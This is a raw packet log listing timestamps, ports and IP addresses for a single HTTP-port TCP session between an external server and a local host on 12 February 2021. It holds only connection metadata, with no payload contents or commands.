Feb 12, 2021 10:01:26.629424095 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629451036 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629477024 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629504919 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629530907 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629556894 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629582882 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629616022 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629617929 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.629647017 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.629651070 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.631231070 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.710591078 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710635900 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710669994 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710699081 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710714102 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.710731030 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710762024 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710776091 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.710800886 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710834026 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710863113 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710869074 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.710895061 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710927010 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710933924 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.710956097 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.710968971 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.710988998 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.711019993 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.711025953 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.711056948 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.711091042 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.711093903 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.711247921 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.712090969 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.712126970 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.712156057 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.712193012 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.712276936 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.712353945 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792062998 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792093039 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792118073 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792140961 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792169094 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792192936 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792210102 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792217016 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792241096 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792243004 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792264938 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792287111 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792289019 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792310953 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792310953 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792334080 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792362928 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792370081 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792381048 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792387962 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792388916 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792412996 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792437077 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792448997 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792459011 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792483091 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792505026 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792526960 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792553902 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792558908 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792578936 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792582035 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792602062 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792623997 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792629004 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792646885 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792668104 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792690039 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792711973 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792711973 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792721987 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792741060 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792766094 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792785883 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792787075 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792810917 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792819023 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.792973042 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.792999029 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.793005943 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.793021917 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.793045044 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.793066978 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.793092966 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.793098927 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.793124914 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.793132067 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.793148994 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.793152094 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.793376923 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.873687983 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873712063 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873725891 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873748064 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873760939 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873779058 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873792887 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873809099 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873831034 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873848915 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.873852968 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873872995 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873881102 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.873891115 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873910904 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873929024 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873933077 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.873943090 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873958111 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873971939 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873980999 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.873985052 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.873999119 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874012947 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874025106 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874039888 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874053955 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874068022 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874083042 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874095917 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874110937 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874129057 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874142885 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874157906 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874174118 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874191999 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874206066 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874218941 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874221087 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874238968 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874243975 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874253988 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874268055 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874279022 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874290943 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874308109 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874320984 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874320030 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874336004 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874353886 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874352932 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874368906 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874382019 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874396086 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874406099 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874411106 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874427080 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874429941 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874440908 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.874459028 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874475956 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.874569893 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955542088 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955574989 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955591917 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955609083 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955626011 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955646992 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955665112 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955682039 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955693960 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955707073 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955719948 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955739975 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955738068 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955760956 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955768108 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955780029 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955797911 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955802917 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955816031 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955831051 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955840111 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955864906 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955883980 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955893040 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955899954 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955920935 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955924988 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955940008 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955955982 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.955956936 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.955976963 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956000090 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956017971 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956034899 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956051111 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956064939 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956078053 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956094980 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956108093 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956110954 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956114054 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956129074 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956146002 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956155062 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956162930 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956180096 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956188917 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956199884 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956209898 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956226110 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956244946 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956265926 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956279039 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956285954 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956290960 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956304073 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956321001 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956337929 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956350088 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956353903 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956362963 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956371069 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956387997 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956398964 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956404924 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956424952 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.956453085 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.956685066 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037312031 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037342072 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037358046 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037374973 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037422895 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037439108 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037453890 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037455082 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037467003 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037487984 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037508011 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037524939 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037524939 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037540913 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037558079 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037566900 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037575006 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037592888 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037609100 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037626982 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037628889 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037647963 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037657022 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037664890 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037679911 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037682056 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037699938 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037708044 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037715912 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037734985 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037744045 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037750959 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037771940 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037791014 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037806988 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037817955 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037818909 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037822962 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037837982 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037858009 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037877083 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037883997 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037892103 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037908077 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037915945 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.037924051 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037939072 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037950993 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037961960 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037975073 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037986994 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.037998915 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038011074 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038011074 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.038023949 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038036108 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038048029 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038059950 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038074970 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038086891 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038099051 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.038192987 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.038269043 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119018078 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119076014 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119115114 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119153023 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119190931 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119227886 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119266033 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119304895 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119337082 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119353056 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119393110 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119395971 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119434118 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119460106 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119472027 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119509935 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119534969 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119546890 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119585991 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119612932 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119622946 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119669914 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119714022 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119752884 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119752884 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119777918 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119791031 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119829893 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119853973 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.119865894 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119904041 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119940996 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.119988918 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120018005 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.120031118 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120069981 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120106936 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120115042 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.120146990 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120170116 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.120183945 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120223045 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120246887 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.120260954 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120320082 CET	80	49768	35.228.31.40	192.168.2.6
